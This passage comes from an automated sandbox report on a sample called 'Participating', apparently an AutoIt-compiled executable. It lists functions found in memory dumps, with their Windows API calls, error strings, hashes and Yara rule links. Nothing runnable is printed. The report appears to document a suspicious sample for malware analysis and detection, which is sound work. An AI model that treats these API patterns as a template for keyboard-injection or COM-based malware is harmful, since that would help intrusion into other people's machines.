                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00D21B22
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00D21B2E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1ee616d2f9fa68290f826a4bcb8f8a797b35c3ddc1a049eb9c2ef14c6a952f2b
                                                                                                                                                                                                                                                                  • Instruction ID: 30f71e113f20ac912adbd0abf76da6763e92882d6a99578795435ac983f01f0d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ee616d2f9fa68290f826a4bcb8f8a797b35c3ddc1a049eb9c2ef14c6a952f2b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E91D875E002366EDB208F64E891AEE7BB5EF39318F188169E855E7140E735DD80CB70
                                                                                                                                                                                                                                                                  Function 00D64F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                  • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                  • Opcode ID: 8ab241be4c86136606f4909315bd83db2e50c8fc75e3ec653952bd6e1284a838
                                                                                                                                                                                                                                                                  • Instruction ID: 81feed2b1959d5ff45f56e2c17ebb667cba715db8b6903c887dd08b8f5f1a18f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ab241be4c86136606f4909315bd83db2e50c8fc75e3ec653952bd6e1284a838
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58919C71A00719ABCF20CFA5DC48FAEBBB8EF46314F148559F905AB284D7749985CBB0
                                                                                                                                                                                                                                                                  Function 00D51B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00D51C1B
                                                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D51C43
                                                                                                                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00D51C67
                                                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D51C97
                                                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D51D1E
                                                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D51D83
                                                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D51DEF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0e5c3e52afc49075de3d857021d99aeb70f47cb5ea9e9790a1b659632aaa535a
                                                                                                                                                                                                                                                                  • Instruction ID: 20050113f1405261929162d91389442ea26d58a553f2f26592084d6e9cdb5dc6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e5c3e52afc49075de3d857021d99aeb70f47cb5ea9e9790a1b659632aaa535a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4891AA79A00219AFDF009F98C885BBEB7B4EF04716F14402AED55EB291E775A948CB70
                                                                                                                                                                                                                                                                  Function 00D643A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00D643C8
                                                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00D644D7
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D644E7
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00D6467C
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5169E: VariantInit.OLEAUT32(00000000), ref: 00D516DE
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5169E: VariantCopy.OLEAUT32(?,?), ref: 00D516E7
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5169E: VariantClear.OLEAUT32(?), ref: 00D516F3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                  • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                  • Opcode ID: a7608aef31c612d3a69bedabfdb5bcdaf94ebb5ead8a52fcf2a1924c531d3dda
                                                                                                                                                                                                                                                                  • Instruction ID: 53ed158c8150cba1c22a195ad1e5850278ae725bd67a99e1571c707ee1a18f75
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7608aef31c612d3a69bedabfdb5bcdaf94ebb5ead8a52fcf2a1924c531d3dda
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08915874A083419FC700EF24C48196AB7E5FF89714F14892DF88A9B351DB71ED4ACBA2
                                                                                                                                                                                                                                                                  Function 00D6560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D408FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?,?,?,00D40C4E), ref: 00D4091B
                                                                                                                                                                                                                                                                    • Part of subcall function 00D408FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?,?), ref: 00D40936
                                                                                                                                                                                                                                                                    • Part of subcall function 00D408FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?,?), ref: 00D40944
                                                                                                                                                                                                                                                                    • Part of subcall function 00D408FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?), ref: 00D40954
                                                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00D656AE
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D657B6
                                                                                                                                                                                                                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00D6582C
                                                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 00D65837
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                  • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                  • Opcode ID: b568ee10679b1a33a56fb336343cdff5c9cca1a24cea1d1d582f1d5056524d20
                                                                                                                                                                                                                                                                  • Instruction ID: b983dc0b0ea603caf036e0cf7cd557adb226b1b9e14714c3aad01a75e95e268d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b568ee10679b1a33a56fb336343cdff5c9cca1a24cea1d1d582f1d5056524d20
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5910471D00259AFDF11DFA4D880AEEBBB9AF08304F104169E919A7255EB719E84DFB0
                                                                                                                                                                                                                                                                  Function 00D72B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetMenu.USER32(?), ref: 00D72C1F
                                                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00D72C51
                                                                                                                                                                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00D72C79
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D72CAF
                                                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00D72CE9
                                                                                                                                                                                                                                                                  • GetSubMenu.USER32(?,?), ref: 00D72CF7
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D443AD
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: GetCurrentThreadId.KERNEL32 ref: 00D443B4
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D42F00), ref: 00D443BB
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00D72D7F
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4F292: Sleep.KERNEL32 ref: 00D4F30A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                  • Opcode ID: b4bcd3e09c3663bfd798cec5b9db2e4e770851f5cc053f240d9019f5f468e610
                                                                                                                                                                                                                                                                  • Instruction ID: f73f44dfb80950e4879f97151bf3d3851fcf87ee623508c8a40dcef3a170ebed
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4bcd3e09c3663bfd798cec5b9db2e4e770851f5cc053f240d9019f5f468e610
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B171AD75A00245AFCB11DF65C885ABEBBF5EF48310F148459E85AEB351EB34EE418BA0
                                                                                                                                                                                                                                                                  Function 00D788F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsWindow.USER32(00000000), ref: 00D78992
                                                                                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00D7899E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00D78A79
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00D78AAC
                                                                                                                                                                                                                                                                  • IsDlgButtonChecked.USER32(?,00000000), ref: 00D78AE4
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 00D78B06
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00D78B1E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                  • Opcode ID: 41bc30bd5d5119aa4b8309e7df36a5f95fc83ca97966bb1c7afd0cb3a27331ca
                                                                                                                                                                                                                                                                  • Instruction ID: f5b4b7e9aca45919d8f6feb66ebc492640074d171e96ac1e73762493fbce5d79
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41bc30bd5d5119aa4b8309e7df36a5f95fc83ca97966bb1c7afd0cb3a27331ca
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A671AF74680304EFDB219F54C889FBA7BB5EF09300F188459E95DA7361EB31A980EB31
                                                                                                                                                                                                                                                                  Function 00D4B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00D4B8C0
                                                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00D4B8D5
                                                                                                                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00D4B936
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00D4B964
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00D4B983
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00D4B9C4
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00D4B9E7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                                                                                                                                  • Opcode ID: a9fbda7959066394471252658cff4772d662f93148445e4a9c9601cb05023187
                                                                                                                                                                                                                                                                  • Instruction ID: 96c7c79cab0827d942042cd98bab2a52c02b01e8d34262089821057d7bd2c705
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9fbda7959066394471252658cff4772d662f93148445e4a9c9601cb05023187
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F251E0A05087D53FFB3642348846BBA7EA99F16324F0C848AE1D9458D2C3D8EDC4DB71
                                                                                                                                                                                                                                                                  Function 00D4B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetParent.USER32(00000000), ref: 00D4B6E0
                                                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00D4B6F5
                                                                                                                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00D4B756
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00D4B782
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00D4B79F
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00D4B7DE
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00D4B7FF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9da004466954587cf13d25cad5fb2f42bb00fcd44ca982f92262eddab3daa80b
                                                                                                                                                                                                                                                                  • Instruction ID: 08e14cef91e466e98a2d77e35af23860ff93bfcb9db9280a4689d851c0c52c2e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9da004466954587cf13d25cad5fb2f42bb00fcd44ca982f92262eddab3daa80b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC51E4A09047D53FFB3283348C55B7A7EA99F55314F0C848AE0D95A8D2D394EC94E771
                                                                                                                                                                                                                                                                  Function 00D157A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00D15F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00D157E3
                                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00D1585E
                                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00D15879
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00D1589F
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,00D15F16,00000000,?,?,?,?,?,?,?,?,?,00D15F16,?), ref: 00D158BE
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,00D15F16,00000000,?,?,?,?,?,?,?,?,?,00D15F16,?), ref: 00D158F7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5365bdfd56867d342325b30486c4fab9d6a574955cf9eefaf60fe55660362643
                                                                                                                                                                                                                                                                  • Instruction ID: cef94440b02165cd2a21a3fa186eeba0865428a0389baac4303352790cf23b1e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5365bdfd56867d342325b30486c4fab9d6a574955cf9eefaf60fe55660362643
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9351A3B1A00649EFCB10CFA8E941AEEBBF9EF48310F14411AE955E7291DB349981CF71
                                                                                                                                                                                                                                                                  Function 00D03090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D030BB
                                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D030C3
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D03151
                                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00D0317C
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D031D1
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
